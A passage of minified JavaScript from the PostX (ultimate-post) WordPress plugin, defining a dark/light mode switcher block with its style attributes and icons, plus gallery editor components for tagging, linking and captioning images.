Mode","ultimate-post"),options:[{type:"color",key:"lightTextColor",label:__("Light Color","ultimate-post")},{type:"color",key:"lightIconColor",label:__("Icon Color","ultimate-post")},{type:"color2",key:"lightIconBg",label:__("Icon Background Color","ultimate-post")},{type:"color2",key:"switcherBg",label:__("Background Color","ultimate-post")},{type:"border",key:"switcherBorder",label:__("Border","ultimate-post")},{type:"boxshadow",key:"switcherShadow",step:1,unit:!0,responsive:!0,label:__("Box shadow","ultimate-post")}]},{name:"dark",title:__("Dark Mode","ultimate-post"),options:[{type:"color",key:"darkTextColor",label:__("Dark Color","ultimate-post")},{type:"color",key:"lightIconColorDark",label:__("Icon Color","ultimate-post")},{type:"color2",key:"lightIconBgDark",label:__("Icon Background Color","ultimate-post")},{type:"color2",key:"switcherBgDark",label:__("Background Color","ultimate-post")},{type:"border",key:"switcherBorderDark",label:__("Border","ultimate-post")},{type:"boxshadow",key:"switcherShadowDark",step:1,unit:!0,responsive:!0,label:__("Box shadow","ultimate-post")}]}]}}],initialOpen:!0,store:A})),(0,o.createElement)(n.Section,{slug:"advanced",title:__("Advanced","ultimate-post")},(0,o.createElement)(a.yB,{initialOpen:!0,store:A}),(0,o.createElement)(a.Mg,{store:A}),(0,o.createElement)(a.iv,{store:A})))),(0,o.createElement)("div",N,H&&(0,o.createElement)("style",{dangerouslySetInnerHTML:{__html:H}}),(0,o.createElement)("div",{className:"ultp-dark-light-block-wrapper ultp-block-wrapper"},!ultp_data.active&&(0,o.createElement)("div",{className:"ultp-pro-helper"},(0,o.createElement)("div",{className:"ultp-pro-helper__upgrade"},(0,o.createElement)("span",null,"To Unlock Dark Light Block"),(0,o.createElement)("a",{className:"ultp-upgrade-pro",href:(0,r.Z)({utmKey:"editor_darklight"}),target:"_blank",rel:"noreferrer"}," ","Upgrade to Pro"," "))),(0,o.createElement)("div",{className:`ultp-dark-light-block-wrapper-content ${_}`},B?(0,o.createElement)("div",{className:"ultp-dl-after-before-con ultp-dl-dark "+(E?"ultp-dl-reverse":"")},L&&"layout7"!=_&&["left","both"].includes(I)&&(0,o.createElement)("div",{className:"ultp-dl-before-after-text "+("both"!=I?"darkText":"lightText")},"both"!=I?P:S),(0,o.createElement)("div",{className:"ultp-dl-con ultp-dark-con "+(E?"ultp-dl-reverse":"")},["layout5","layout6","layout7"].includes(_)&&(0,o.createElement)("div",{className:"ultp-dl-text darkText"},"layout5"==_&&(0,o.createElement)("div",{className:"ultp-dl-democircle ultphidden"}),"layout6"==_&&(0,o.createElement)("div",{className:"ultp-dl-democircle"}),"layout7"==_&&P),(0,o.createElement)("div",{className:"ultp-dl-svg-con"},(0,o.createElement)("div",{className:"ultp-dl-svg"},s.Z["line"==C?"moon_line":"moon"]))),L&&"layout7"!=_&&["right","both"].includes(I)&&(0,o.createElement)("div",{className:"ultp-dl-before-after-text darkText"},P)):(0,o.createElement)("div",{className:"ultp-dl-after-before-con ultp-dl-light "+(E?"ultp-dl-reverse":"")},L&&"layout7"!=_&&["left","both"].includes(I)&&(0,o.createElement)("div",{className:"ultp-dl-before-after-text lightText"},S),(0,o.createElement)("div",{className:"ultp-dl-con ultp-light-con "+(E?"ultp-dl-reverse":"")},(0,o.createElement)("div",{className:"ultp-dl-svg-con"},(0,o.createElement)("div",{className:"ultp-dl-svg"},s.Z["line"==C?"sun_line":"sun"])),["layout5","layout6","layout7"].includes(_)&&(0,o.createElement)("div",{className:"ultp-dl-text lightText"},"layout5"==_&&(0,o.createElement)("div",{className:"ultp-dl-democircle ultphidden"}),"layout6"==_&&(0,o.createElement)("div",{className:"ultp-dl-democircle"}),"layout7"==_&&S)),L&&"layout7"!=_&&["right","both"].includes(I)&&(0,o.createElement)("div",{className:"ultp-dl-before-after-text "+("both"!=I?"lightText":"darkText")},"both"!=I?S:P))))))}},732:(e,t,l)=>{"use strict";l.d(t,{Z:()=>o});const o={blockId:{type:"string",default:""},blockPubDate:{type:"string",default:"empty"},previewImg:{type:"string",default:""},previewDark:{type:"boolean",default:!1},currentPostId:{type:"string",default:""},layout:{type:"string",default:"layout1"},iconType:{type:"string",default:"solid"},reverseSwitcher:{type:"boolean",default:!1,style:[{depends:[{key:"layout",condition:"==",value:"layout5"}]},{depends:[{key:"layout",condition:"==",value:"layout6"}]},{depends:[{key:"layout",condition:"==",value:"layout7"}]}]},iconSize:{type:"string",default:"24",style:[{selector:"{{ULTP}} .ultp-dark-light-block-wrapper .ultp-dl-svg-con svg,\n                {{ULTP}} .ultp-dark-light-block-wrapper .ultp-dl-democircle { height: {{iconSize}}px; width: {{iconSize}}px; }"},{depends:[{key:"layout",condition:"==",value:"layout1"}],selector:"{{ULTP}} .ultp-dark-light-block-wrapper .ultp-dl-svg-con svg { height: calc({{iconSize}}px*4/6); width:calc({{iconSize}}px*4/6); }\n                {{ULTP}} .ultp-dark-light-block-wrapper .ultp-dl-con { padding: calc({{iconSize}}px/3) {{iconSize}}px ; border-radius: {{iconSize}}px;  }"},{depends:[{key:"layout",condition:"==",value:"layout3"}],selector:"{{ULTP}} .ultp-dark-light-block-wrapper .ultp-dl-con { padding: calc({{iconSize}}px/3); border-radius: 100%;  }"},{depends:[{key:"layout",condition:"==",value:"layout4"}],selector:"{{ULTP}} .ultp-dark-light-block-wrapper .ultp-dl-con { padding: {{iconSize}}px calc({{iconSize}}px/3); border-radius: {{iconSize}}px;  }"},{depends:[{key:"layout",condition:"==",value:"layout5"}],selector:"{{ULTP}} .ultp-dark-light-block-wrapper .ultp-dl-svg-con svg { height: calc({{iconSize}}px*4/6); width:calc({{iconSize}}px*4/6); }\n                {{ULTP}} .ultp-dark-light-block-wrapper .ultp-dl-con { gap: calc({{iconSize}}px/2);  padding: calc({{iconSize}}px/6); border-radius: {{iconSize}}px; }\n                {{ULTP}} .ultp-dark-light-block-wrapper .ultp-dl-con .ultp-dl-svg { padding: calc({{iconSize}}px/6); border-radius: {{iconSize}}px; }"},{depends:[{key:"layout",condition:"==",value:"layout6"}],selector:"{{ULTP}} .ultp-dark-light-block-wrapper .ultp-dl-con { gap: calc({{iconSize}}px/2);  padding: calc({{iconSize}}px/6); border-radius: {{iconSize}}px; }"},{depends:[{key:"layout",condition:"==",value:"layout7"}],selector:"{{ULTP}} .ultp-dark-light-block-wrapper .ultp-dl-svg-con svg { height: calc({{iconSize}}px*4/6); width:calc({{iconSize}}px*4/6); }\n                {{ULTP}} .ultp-dark-light-block-wrapper .ultp-dl-con { padding: calc({{iconSize}}px/6); border-radius: {{iconSize}}px; }\n                {{ULTP}} .ultp-dark-light-block-wrapper .ultp-dl-con .ultp-dl-svg { padding: calc({{iconSize}}px/6); border-radius: {{iconSize}}px; }\n                {{ULTP}} .ultp-dark-light-block-wrapper .ultp-dl-con .ultp-dl-text {margin: 0px calc({{iconSize}}px/2); }"}]},enableText:{type:"boolean",default:!1,style:[{depends:[{key:"layout",condition:"!=",value:"layout7"}]}]},textAppears:{type:"string",default:"both",style:[{depends:[{key:"layout",condition:"!=",value:"layout7"},{key:"enableText",condition:"==",value:!0}]}]},lightText:{type:"string",default:"Light Mode",style:[{depends:[{key:"enableText",condition:"==",value:!0}]},{depends:[{key:"layout",condition:"==",value:"layout7"}]}]},darkText:{type:"string",default:"Dark Mode",style:[{depends:[{key:"enableText",condition:"==",value:!0}]},{depends:[{key:"layout",condition:"==",value:"layout7"}]}]},textTypo:{type:"object",default:{openTypography:1,size:{lg:12,unit:"px"},height:{lg:"14",unit:"px"},decoration:"none",family:"",weight:400},style:[{depends:[{key:"enableText",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-dark-light-block-wrapper .ultp-dl-before-after-text"},{depends:[{key:"layout",condition:"==",value:"layout7"}],selector:"{{ULTP}} .ultp-dark-light-block-wrapper .ultp-dl-text"}]},textSwictherGap:{type:"string",default:"10",style:[{depends:[{key:"enableText",condition:"==",value:!0},{key:"layout",condition:"!=",value:"layout7"}],selector:"{{ULTP}} .ultp-dark-light-block-wrapper .ultp-dl-after-before-con { gap: {{textSwictherGap}}px; }"}]},lightTextColor:{type:"string",default:"#2E2E2E",style:[{depends:[{key:"enableText",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-dark-light-block-wrapper .ultp-dl-light .ultp-dl-before-after-text.lightText { color: {{lightTextColor}}; }"},{depends:[{key:"textAppears",condition:"==",value:"both"}],selector:"{{ULTP}} .ultp-dark-light-block-wrapper .ultp-dl-light .ultp-dl-before-after-text.darkText { color: {{lightTextColor}}; opacity: 0.4; }"},{depends:[{key:"layout",condition:"==",value:"layout7"}],selector:"{{ULTP}} .ultp-dark-light-block-wrapper .ultp-dl-light .ultp-dl-text.lightText { color: {{lightTextColor}}; }"}]},lightIconColor:{type:"string",default:"#2E2E2E",style:[{selector:"{{ULTP}} .ultp-dark-light-block-wrapper .ultp-light-con svg { color: {{lightIconColor}}; }"}]},lightIconBg:{type:"object",default:{openColor:1,type:"color",color:"#9A9A9A",size:"cover",repeat:"no-repeat"},style:[{depends:[{key:"layout",condition:"==",value:"layout5"}],selector:"{{ULTP}} .ultp-dark-light-block-wrapper .ultp-light-con .ultp-dl-svg"},{depends:[{key:"layout",condition:"==",value:"layout6"}],selector:"{{ULTP}} .ultp-dark-light-block-wrapper .ultp-light-con .ultp-dl-democircle"},{depends:[{key:"layout",condition:"==",value:"layout7"}],selector:"{{ULTP}} .ultp-dark-light-block-wrapper .ultp-light-con .ultp-dl-svg"}]},switcherBg:{type:"object",default:{openColor:1,type:"color",color:"#C3C3C3",size:"cover",repeat:"no-repeat"},style:[{depends:[{key:"layout",condition:"!=",value:"layout2"}],selector:"{{ULTP}} .ultp-dark-light-block-wrapper .ultp-dl-con.ultp-light-con"}]},switcherBorder:{type:"object",default:{openBorder:0,width:{top:2,right:2,bottom:2,left:2},color:"#9A9A9A"},style:[{depends:[{key:"layout",condition:"!=",value:"layout2"}],selector:"{{ULTP}} .ultp-dark-light-block-wrapper .ultp-dl-con.ultp-light-con"}]},switcherShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{depends:[{key:"layout",condition:"!=",value:"layout2"}],selector:"{{ULTP}} .ultp-dark-light-block-wrapper .ultp-dl-con.ultp-light-con"}]},darkTextColor:{type:"string",default:"#F4F4F4",style:[{depends:[{key:"enableText",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-dark-light-block-wrapper .ultp-dl-dark .ultp-dl-before-after-text.darkText { color: {{darkTextColor}}; }"},{depends:[{key:"textAppears",condition:"==",value:"both"}],selector:"{{ULTP}} .ultp-dark-light-block-wrapper .ultp-dl-dark .ultp-dl-before-after-text.lightText { color: {{darkTextColor}}; opacity: 0.4; }"},{depends:[{key:"layout",condition:"==",value:"layout7"}],selector:"{{ULTP}} .ultp-dark-light-block-wrapper .ultp-dl-dark .ultp-dl-text.darkText { color: {{darkTextColor}}; }"}]},lightIconColorDark:{type:"string",default:"#F4F4F4",style:[{selector:"{{ULTP}} .ultp-dark-light-block-wrapper .ultp-dark-con svg { color: {{lightIconColorDark}}; }"}]},lightIconBgDark:{type:"object",default:{openColor:1,type:"color",color:"#9D9D9D",size:"cover",repeat:"no-repeat"},style:[{depends:[{key:"layout",condition:"==",value:"layout5"}],selector:"{{ULTP}} .ultp-dark-light-block-wrapper .ultp-dark-con .ultp-dl-svg"},{depends:[{key:"layout",condition:"==",value:"layout6"}],selector:"{{ULTP}} .ultp-dark-light-block-wrapper .ultp-dark-con .ultp-dl-democircle"},{depends:[{key:"layout",condition:"==",value:"layout7"}],selector:"{{ULTP}} .ultp-dark-light-block-wrapper .ultp-dark-con .ultp-dl-svg"}]},switcherBgDark:{type:"object",default:{openColor:1,type:"color",color:"#646464",size:"cover",repeat:"no-repeat"},style:[{depends:[{key:"layout",condition:"!=",value:"layout2"}],selector:"{{ULTP}} .ultp-dark-light-block-wrapper .ultp-dl-con.ultp-dark-con"}]},switcherBorderDark:{type:"object",default:{openBorder:0,width:{top:2,right:2,bottom:2,left:2},color:"#9D9D9D"},style:[{depends:[{key:"layout",condition:"!=",value:"layout2"}],selector:"{{ULTP}} .ultp-dark-light-block-wrapper .ultp-dl-con.ultp-dark-con"}]},switcherShadowDark:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{depends:[{key:"layout",condition:"!=",value:"layout2"}],selector:"{{ULTP}} .ultp-dark-light-block-wrapper .ultp-dl-con.ultp-dark-con"}]},...(0,l(92165).t)(["advanceAttr"])}},55404:(e,t,l)=>{"use strict";l.d(t,{Z:()=>i});var o=l(67294);const a={};a.moon=(0,o.createElement)("svg",{viewBox:"0 0 24 24",xmlns:"http://www.w3.org/2000/svg",fill:"currentColor"},(0,o.createElement)("path",{d:"M22 14.27A10.14 10.14 0 1 1 9.73 2 8.84 8.84 0 0 0 22 14.27Z"})),a.moon_line=(0,o.createElement)("svg",{viewBox:"0 0 24 24",xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("path",{d:"M8.17 4.53A9.54 9.54 0 0 0 19.5 15.69a8.26 8.26 0 0 1-7.76 4.29 8.36 8.36 0 0 1-7.71-7.7 8.23 8.23 0 0 1 4.15-7.76m1-2.52c-.16 0-.32.03-.48.09a10.28 10.28 0 0 0 3.56 19.9c4.47 0 8.27-2.85 9.67-6.84a1.36 1.36 0 0 0-1.27-1.82c-.15 0-.31.03-.47.1a7.48 7.48 0 0 1-3.41.43 7.59 7.59 0 0 1-6.33-10.04A1.36 1.36 0 0 0 9.17 2Z"})),a.sun=(0,o.createElement)("svg",{viewBox:"0 0 24 24"},(0,o.createElement)("g",null,(0,o.createElement)("path",{d:"M12 18.36a6.36 6.36 0 1 0 0-12.72 6.36 6.36 0 0 0 0 12.72ZM12.98.96V2.8c0 .53-.43.95-.97.95h-.02a.96.96 0 0 1-.97-.95V.96c0-.53.43-.96.96-.96h.05c.53 0 .96.43.96.96ZM4.89 3.5l1.3 1.3c.38.38.37.98 0 1.36h-.01l-.01.02a.96.96 0 0 1-1.37 0l-1.3-1.3a.96.96 0 0 1 0-1.35l.04-.04a.96.96 0 0 1 1.35 0ZM.96 11.02H2.8c.53 0 .95.43.95.97v.02c0 .53-.42.97-.95.97H.96a.95.95 0 0 1-.96-.96v-.05c0-.53.43-.96.96-.96ZM3.5 19.11l1.3-1.3a.96.96 0 0 1 1.36 0v.01l.02.01c.38.38.39.99 0 1.37l-1.3 1.3a.96.96 0 0 1-1.35 0l-.04-.04a.96.96 0 0 1 0-1.35ZM11.02 23.04V21.2c0-.53.43-.95.97-.95h.02c.53 0 .97.42.97.95v1.84c0 .53-.43.96-.96.96h-.05a.95.95 0 0 1-.96-.96ZM19.11 20.5l-1.3-1.3a.96.96 0 0 1 0-1.36h.01l.01-.02a.96.96 0 0 1 1.37 0l1.3 1.3c.38.37.38.98 0 1.35l-.04.04a.96.96 0 0 1-1.35 0ZM23.04 12.98H21.2a.96.96 0 0 1-.95-.97v-.02c0-.53.42-.97.95-.97h1.84c.53 0 .96.43.96.96v.05c0 .53-.43.96-.96.96ZM20.5 4.89l-1.3 1.3a.96.96 0 0 1-1.36 0v-.01l-.02-.01a.96.96 0 0 1 0-1.37l1.3-1.3a.96.96 0 0 1 1.35 0l.04.04c.37.37.37.98 0 1.35Z"})),(0,o.createElement)("defs",null)),a.sun_line=(0,o.createElement)("svg",{viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M12 7.64a4.36 4.36 0 1 1-.01 8.73A4.36 4.36 0 0 1 12 7.64Zm0-2a6.35 6.35 0 1 0 0 12.71 6.35 6.35 0 0 0 0-12.7ZM12.98.96V2.8c0 .53-.43.96-.96.96h-.03a.96.96 0 0 1-.97-.96V.96c0-.53.43-.96.96-.96h.06c.52 0 .95.43.95.96ZM4.88 3.5l1.3 1.3c.38.38.38.98 0 1.36h-.01l-.01.02a.96.96 0 0 1-1.36.01L3.5 4.9a.96.96 0 0 1 0-1.35l.03-.04a.96.96 0 0 1 1.35 0ZM.96 11.02H2.8c.53 0 .96.43.96.96v.03c0 .53-.42.97-.96.97H.96a.96.96 0 0 1-.96-.96v-.06c0-.52.43-.95.96-.95ZM3.5 19.12l1.3-1.3a.96.96 0 0 1 1.38.02c.38.38.39.99.01 1.36l-1.3 1.3a.96.96 0 0 1-1.35 0l-.04-.03a.96.96 0 0 1 0-1.35ZM11.02 23.04V21.2c0-.53.43-.96.96-.96h.03c.53 0 .97.42.97.96v1.84c0 .53-.43.96-.96.96h-.06a.96.96 0 0 1-.95-.96ZM19.12 20.5l-1.3-1.3a.96.96 0 0 1 0-1.36h.01l.01-.02a.96.96 0 0 1 1.36-.01l1.3 1.3c.38.37.38.98 0 1.35l-.03.04a.96.96 0 0 1-1.35 0ZM23.04 12.98H21.2a.96.96 0 0 1-.96-.96v-.03c0-.53.42-.97.96-.97h1.84c.53 0 .96.43.96.96v.06c0 .52-.43.95-.96.95ZM20.5 4.88l-1.3 1.3a.96.96 0 0 1-1.36 0v-.01l-.02-.01a.96.96 0 0 1-.01-1.36l1.3-1.3a.96.96 0 0 1 1.35 0l.04.03c.38.37.38.98 0 1.35Z"}));const i=a},21123:(e,t,l)=>{"use strict";var o=l(67294),a=l(83100),i=l(90466),n=l(732),r=l(28166);const{__}=wp.i18n,{registerBlockType:s}=wp.blocks;(0,a.Z)("https://wpxpo.com/docs/postx/all-blocks/dark-light/","block_docs"),s(r,{icon:(0,o.createElement)("div",{className:"ultp-block-inserter-icon-section"},(0,o.createElement)("img",{src:ultp_data.url+"assets/img/blocks/dark_light.svg"}),!ultp_data.active&&(0,o.createElement)("span",{className:"ultp-pro-block"},"Pro")),description:(0,o.createElement)("span",{className:"ultp-block-info"},__("Switch between Dark and Light versions of your site","ultimate-post")),attributes:n.Z,example:{attributes:{previewImg:ultp_data.url+"assets/img/layouts/dark_light/dark7.svg"}},edit:i.Z,save:()=>null})},49540:(e,t,l)=>{"use strict";l.d(t,{Z:()=>g});var o=l(67294),a=l(69815),i=l(41385),n=l(50828);const{useState:r,useRef:s,useEffect:p}=wp.element,{Modal:c,Tooltip:u}=wp.components,{MediaUploadCheck:d,MediaUpload:m}=wp.blockEditor,g=({store:e,images:t,setAttributes:l,attr:g})=>{const[y,b]=r(!1),[v,h]=r([...t]),[f,k]=r(null),[w,x]=r(null),T=s(null),_=s(null);p((()=>{h([...t])}),[t]);const[C,E]=r(!1),[S,P]=r({}),[L,I]=r(!1),B=g?.imageList?JSON.parse(g?.imageList):[];return(0,o.createElement)("div",{className:"ultp-section-accordion"},(0,o.createElement)("div",{className:"ultp-section-accordion-item ultp-section-control",onClick:()=>b(!y)},(0,o.createElement)("span",{className:"ultp-section-control__help"},"Add Gallery Item"),(0,o.createElement)("span",{className:`ultp-section-arrow dashicons dashicons-arrow-${y?"down":"up"}-alt2`})),(0,o.createElement)("div",{className:"ultp-section-show "+(y?"is-hide":"")},(0,o.createElement)("div",{className:"ultp-gallery-settings"},(0,o.createElement)("div",{className:"ultp-gallery-settings__heading"},(0,o.createElement)(d,null,(0,o.createElement)(m,{gallery:!0,multiple:!0,onSelect:e=>{e.length>0&&l({imageList:JSON.stringify(e.map((e=>({id:e?.id,url:e?.url,alt:e?.alt,sizes:e?.sizes?e?.sizes:[],caption:e.caption}))))})},allowedTypes:["image"],value:B?.map((e=>e?.id?e?.id:"")),render:({open:e})=>(0,o.createElement)("div",{onClick:e,className:"ultp-gallery-settings__add-media"},(0,o.createElement)("span",{className:"ultp-section-arrow dashicons dashicons-plus-alt2"}),"Add Media")})),(0,o.createElement)("div",{className:"ultp-gallery-settings__media-count"},B?.length," Files")),(0,o.createElement)(o.Fragment,null,L&&(0,o.createElement)(c,{className:"ultp-gallery-settings__modal",onRequestClose:()=>I(!1),title:("tag"==C?"Filter":"Link")+" Config. Settings"},"tag"==C&&(0,o.createElement)(a.Z,{store:e,images:t,setEditImgData:P,editImgData:S,attr:g,setEditPanel:E}),"link"==C&&(0,o.createElement)(i.Z,{attr:g,store:e,images:t,setOpen:I,setItems:h,editImgData:S,setEditImgData:P,setEditPanel:E}),"editImg"==C&&(0,o.createElement)(n.Z,{attr:g,items:v,setItems:h,editImgData:S,setEditImgData:P,setAttributes:l}))),(0,o.createElement)("div",{className:"ultp-gallery-settings__content",ref:T,onDrop:e=>{if(e.preventDefault(),_.current===w)return;const t=[...v],o=t[_.current];t.splice(_.current,1),t.splice(w,0,o),h(t),l({imageList:JSON.stringify(t)}),_.current=null,k(null),x(null)},onDragOver:e=>e.preventDefault()},B.map(((t,l)=>(0,o.createElement)("div",{key:t.id,draggable:!0,onDragStart:()=>((e,t)=>{_.current=e,k(e);const l=document.createElement("img");l.src=v[e].sizes.thumbnail?.url,l.style.width="50px",l.style.height="50px",l.style.opacity="0.8"})(l),onDragOver:e=>((e,t)=>{e.preventDefault(),x(t)})(e,l),className:`ultp-gallery-settings__content-item ${f===l?"dragging":""} ${w===l?"target":""}`},(0,o.createElement)("img",{src:t.sizes.thumbnail?.url?.length>0?t.sizes.thumbnail?.url:t?.url,alt:t?.alt,style:{opacity:f===l?.5:1,transition:"opacity 0.2s ease"}}),(0,o.createElement)("div",{className:"ultp-gallery-settings__content-item-action"},(0,o.createElement)(u,{text:"Edit Caption"},(0,o.createElement)("span",{onClick:()=>(e=>{P(e),E("editImg"),I(!0)})(t),className:"dashicons dashicons-edit"})),(0,o.createElement)(u,{text:"Edit Filter"},(0,o.createElement)("span",{onClick:()=>(e=>{I(!0),E("tag"),P(e)})(t),className:"dashicons dashicons-edit-page"})),(0,o.createElement)(u,{text:"Edit Link"},(0,o.createElement)("span",{onClick:()=>(e=>{I(!0),E("link"),P(e)})(t),className:"dashicons dashicons-admin-links"})),(0,o.createElement)(u,{text:"Delete Item"},(0,o.createElement)("span",{onClick:()=>(t=>{const l=v.filter((e=>e.id!=t));h([...l]),e.setAttributes({imageList:JSON.stringify(l)})})(t.id),className:"dashicons dashicons-trash"}))))))))))}},69815:(e,t,l)=>{"use strict";l.d(t,{Z:()=>n});var o=l(67294);const{useState:a,useEffect:i}=wp.element,n=({attr:e,setEditPanel:t,store:l,editImgData:n,setEditImgData:r,images:s})=>{const[p,c]=a(!1),[u,d]=a(""),[m,g]=a(n),[y,b]=a(!1),[v,h]=a(""),[f,k]=a(!1),[w,x]=a(null==JSON.parse(l?.attributes?.tagStorage)?[]:JSON.parse(l?.attributes?.tagStorage)),T=e=>{const t=m?.tag.filter((t=>t!=e));m.tag=t,g({...m}),r({...m})};i((()=>{const e=s.findIndex((e=>e.id===m.id)),t=[...s];-1!==e?t[e]=m:t.push(m),l.setAttributes({imageList:JSON.stringify(t)})}),[m]),i((()=>{n?.id&&(async e=>{const t=await(wp?.data?.resolveSelect("core")?.getEntityRecord("postType","attachment",n?.id));t&&t?.title?.raw?.length>0?d(t?.title?.raw):console.error("Media details not found for ID:",e)})(n.id)}),[n?.id]);const[_,C]=a(!1);return(0,o.createElement)("div",{className:"ultp-gallery-query-tag"},(0,o.createElement)("div",{className:"ultp-gallery-query-tag__image-container"},u?.length>0&&(0,o.createElement)("span",null,u),(0,o.createElement)("img",{src:n.url,alt:n.alt})),(0,o.createElement)("div",null,(0,o.createElement)("div",{className:"ultp-gallery-query-tag__selected-list"},m?.tag?.length>0?m?.tag.map((e=>(0,o.createElement)("span",{key:e,onClick:()=>T(e)},(0,o.createElement)("span",{className:"dashicons dashicons-dismiss pgc-delete-icon"}),e))):(0,o.createElement)("div",null,"Not Any Tag Selected")),(0,o.createElement)("div",{className:"ultp-gallery-query-tag__new"},(0,o.createElement)("input",{type:"text",value:v,onChange:e=>{return t=e.target.value,h(t),void b(!1);var t}}),(0,o.createElement)("button",{className:v&&v.length>0&&/^(?=.*[a-zA-Z0-9])[a-zA-Z0-9\s]+$/.test(v)&&!y?"":"add-new-tag-btn",onClick:()=>(()=>{const e=JSON.parse(l?.attributes?.tagStorage).includes(v);if(v&&!e){var t;const e=[...null!==(t=m?.tag)&&void 0!==t?t:""];m.tag=[...e,v],g({...m}),r({...m});const o=[...w,v];x([...o]),l.setAttributes({tagStorage:JSON.stringify(o)}),h("")}else b(!0)})()},"Add New")),(0,o.createElement)("div",{className:"ultp-gallery-query-tag__new-help"},y?"This tag is Exist":"Allowed Ony Text and Number"),w?.length>0?(0,o.createElement)("div",{className:"ultp-gallery-query-tag__get-tag-store",onClick:()=>(C(!_),void k(!1))},_?"Hide Storage":"Get from Tag storage"," ",(0,o.createElement)("span",{className:"dashicons dashicons-update-alt "})):"",_&&w?.length>0&&(0,o.createElement)("div",{className:"ultp-gallery-query-tag__existing-tag-container "+(f?"remove-tag-active":"")},w.map((e=>(0,o.createElement)("span",{key:e,className:"ultp-gallery-query-tag__existing-tag "+(m?.tag?.length>0&&m?.tag.includes(e)&&!f?"tag-disable":""),onClick:()=>(e=>{if(f){T(e);const t=w.filter((t=>t!=e));x([...t]),l.setAttributes({tagStorage:JSON.stringify(t)}),s.map((t=>{const l=t?.tag?.filter((t=>t!=e));t.tag=l})),l.setAttributes({imageList:JSON.stringify(s)})}else{var t;const l=[...null!==(t=m?.tag)&&void 0!==t?t:""];m.tag=[...l,e],g({...m}),r({...m})}})(e)},f?(0,o.createElement)("span",{className:"dashicons dashicons-no-alt"}):(0,o.createElement)("span",{className:"dashicons dashicons-tag"}),e)))),_&&w?.length>0&&(0,o.createElement)("div",{className:"ultp-gallery-query-tag__remove-tag "+(f?"removing-done":""),onClick:()=>k(!f)},f?"Tag Removing Done":"Delete Specific Tag",f?(0,o.createElement)("span",{className:"dashicons dashicons-yes"}):(0,o.createElement)("span",{className:"dashicons dashicons-trash"}))))}},41385:(e,t,l)=>{"use strict";l.d(t,{Z:()=>p});var o=l(67294);const{useState:a,useRef:i,useEffect:n}=wp.element,{TextControl:r,CheckboxControl:s}=wp.components,p=({attr:e,setEditPanel:t,store:l,editImgData:i,setEditImgData:p,images:c,setOpen:u,setItems:d})=>{let m=JSON.parse(l?.attributes?.pageListData);const[g,y]=a(i?.link?i?.link:""),[b,v]=a(""),[h,f]=a(!!i?.newTab&&i?.newTab);return n((()=>{const e=setTimeout((()=>{v(b)}),500);return()=>{clearTimeout(e)}}),[b]),m=m.filter((e=>e.title.toLowerCase().includes(b?.toLowerCase()))),(0,o.createElement)("div",{className:"ultp-gallery-query-link"},(0,o.createElement)("div",null,(0,o.createElement)(r,{value:g,label:"Enter The Destination URL",placeholder:"Enter The Destination URL.....",onChange:e=>{y(e),v("")}})),(0,o.createElement)("div",null,(0,o.createElement)(r,{label:"Or link to existing content",value:b,placeholder:"Search Targeted Page name",onChange:e=>v(e)})),m?.length>0&&(0,o.createElement)(o.Fragment,null,(0,o.createElement)("div",{className:"ultp-gallery-link-page__label"},"All Page List"),(0,o.createElement)("div",{className:"ultp-gallery-link-page"},m.map((e=>(0,o.createElement)("div",{key:e.id,onClick:()=>((e,t)=>{v(e),y(t)})(e.title,e.link),className:"ultp-gallery-link-page__single-page",contentEditable:!1},e.title))))),!m?.length&&(0,o.createElement)("div",{className:"ultp-gallery-link__no-page"},"No Page Match"),(0,o.createElement)(s,{label:"Open New Tab",checked:h,onChange:e=>f(e)}),(0,o.createElement)("div",{className:"ultp-gallery-query-link__bottom-content"},(0,o.createElement)("div",{onClick:()=>(()=>{const e=i;g?.length>0&&(e.link=g,e.newTab=h),c.map((t=>{t.id==e.id&&(t.link=g,t.newTab=h)})),d([...c]),l.setAttributes({imageList:JSON.stringify(c)}),u(!1)})(),className:"ultp-gallery-query-link__bottom-content__add-link"},(0,o.createElement)("span",{className:"ultp-section-arrow dashicons dashicons-plus-alt2"}),"Add Link")))}},50828:(e,t,l)=>{"use strict";l.d(t,{Z:()=>n});var o=l(67294);const{useState:a}=wp.element,{TextControl:i}=wp.components,n=({editImgData:e,attr:t,setEditImgData:l,setItems:n,items:r,setAttributes:s})=>{const[p,c]=a(e?.alt?.length>0?e?.alt:""),[u,d]=a(e?.caption?.length>0?e?.caption:"");return(0,o.createElement)("div",{className:"ultp-gallery-img-data"},(0,o.createElement)("div",{className:"ultp-gallery-img-data__content"},(0,o.createElement)("div",{className:"ultp-gallery-img-data__content-img-container"},(0,o.createElement)("img",{src:e?.url,alt:e?.alt})),(0,o.createElement)("div",{className:"ultp-gallery-img-data__content-field-container"},(0,o.createElement)(i,{label:"Caption",value:u,className:"ultp-gallery-img-data__caption",onChange:t=>{return d(l=t),void wp.apiFetch({path:`/wp/v2/media/${e.id}`,method:"POST",data:{caption:l}}).then((t=>{t?.caption?.raw?.length>0&&(r.map((l=>{l.id==e.id&&(l.caption=t?.caption?.raw)})),n([...r]),s({imageList:JSON.stringify(r)}))})).catch((e=>{console.error("Error updating caption:",e)}));var l},placeholder:"Enter Image Caption..."}),(0,o.createElement)(i,{label:"Alternative Text",value:p,className:"ultp-gallery-img-data__alt-text",onChange:t=>{return c(l=t),void wp.apiFetch({path:`/wp/v2/media/${e.id}`,method:"POST",data:{alt_text:l}}).then((t=>{t?.alt_text?.length>0&&(r.map((l=>{l.id==e.id&&(l.alt=t?.alt_text)})),n([...r]),s({imageList:JSON.stringify(r)}))})).catch((e=>{console.error("Error updating caption:",e)}));var l},placeholder:"Enter Image Alternative Text..."}))))}},35343:(e,t,l)=>{"use strict";l.d(t,{Z:()=>k});var o=l(67294),a=l(53049),i=l(99838),n=l(59902),r=l(64766),s=l(75938),p=l(65638);const{__}=wp.i18n,{useEffect:c,useState:u,Fragment:d,useRef:m}=wp.element,{RichText:g,MediaUploadCheck:y,MediaPlaceholder:b,useBlockProps:v}=wp.blockEditor,{getBlockAttributes:h,getBlockRootClientId:f}=wp.data.select("core/block-editor");function 